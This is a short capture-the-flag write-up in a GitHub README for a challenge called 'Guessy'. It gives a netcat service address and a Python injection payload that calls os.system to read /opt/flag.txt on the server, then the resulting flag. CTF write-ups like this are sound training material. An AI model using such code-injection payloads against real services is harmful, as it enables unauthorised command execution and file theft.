Skip to content

Latest commit

 

History

History
17 lines (10 loc) · 235 Bytes

README.md

File metadata and controls

17 lines (10 loc) · 235 Bytes

../

Guessy

guess

We love guess challenges!

Guess the flag: nc 138.68.96.149 4422

Solution

Enter the following to print out the flag:

__import__("os").system("cat /opt/flag.txt")

flag: flag{password123}